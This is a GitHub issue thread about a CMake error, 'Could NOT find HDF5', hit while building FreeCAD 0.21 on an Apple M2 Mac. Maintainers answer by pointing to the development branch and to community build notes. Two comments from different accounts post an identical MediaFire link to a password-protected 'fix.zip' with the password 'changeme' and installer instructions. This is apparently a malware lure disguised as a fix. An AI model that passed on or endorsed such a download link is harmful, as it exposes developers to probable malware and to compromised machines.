### ISSUE TITLE
Mac with 0.21 error:Could NOT find HDF5 (missing: HDF5_LIBRARIES HDF5_HL_LIBRARIES)

### ISSUE THREAD

**Issue by mylysddp** [FreeCAD/FreeCAD#16070]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

When I execute the `cmake` command on a Mac with M2 chip, I always get an error.
`cmake  -DCMAKE_BUILD_TYPE="Release" -DQt5_DIR="/opt/homebrew/Cellar/qt@5/5.15.13_1/lib/cmake/QT5"  -DPySide2_DIR="/opt/homebrew/opt/pyside2@5.15.11_py310/lib/cmake/PySide2-5.15.11"  DShiboken2_DIR="/opt/homebrew/opt/pyside2@5.15.11_py310/lib/cmake/Shiboken2-5.15.11"  ../FreeCAD-releases-FreeCAD-0-21 `

<img width="729" alt="image" src="https://github.com/user-attachments/assets/454363b0-ffa0-4242-9c1d-d40e555380c4">

![image](https://github.com/user-attachments/assets/706970b3-e184-4967-82e9-fed9dfa4b5f5)

![image](https://github.com/user-attachments/assets/98ef3e11-4719-4c88-9984-e1be9a3b40aa)

I don’t know where I need to set it up. Has anyone encountered this problem?

### Full version info

```shell
0.21
```

### Subproject(s) affected?

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luzpaz** [comment]
@johnocfii could you weigh-in here at your convenience ?

**Comment by JohnOCFII** [comment]
> @JohnOCFII could you weigh-in here at your convenience ?

It looks like the OP is attempting to build FreeCAD 0.21.  I've never done that successfully.  For building 0.22 on Macintosh, I've used the process described here: https://github.com/oursland/FreeCAD-Build-Notes

**Comment by luzpaz** [comment]
@mylysddp our efforts are focused on the development version right now. In that case, please try to build development 'main' branch and report back any issues. TY

**Comment by mylysddp** [comment]
> > @JohnOCFII could you weigh-in here at your convenience ?
> 
> It looks like the OP is attempting to build FreeCAD 0.21. I've never done that successfully. For building 0.22 on Macintosh, I've used the process described here: https://github.com/oursland/FreeCAD-Build-Notes

Thank you, I will try this step to compile.

**Comment by mylysddp** [comment]
> @mylysddp our efforts are focused on the development version right now. In that case, please try to build development 'main' branch and report back any issues. TY

Okay. By the way, when is the 1.0 version planned to be released?  (*^▽^*)

**Comment by luzpaz** [comment]
@mylysddp when all https://github.com/FreeCAD/FreeCAD/labels/Blocker tickets are resolved
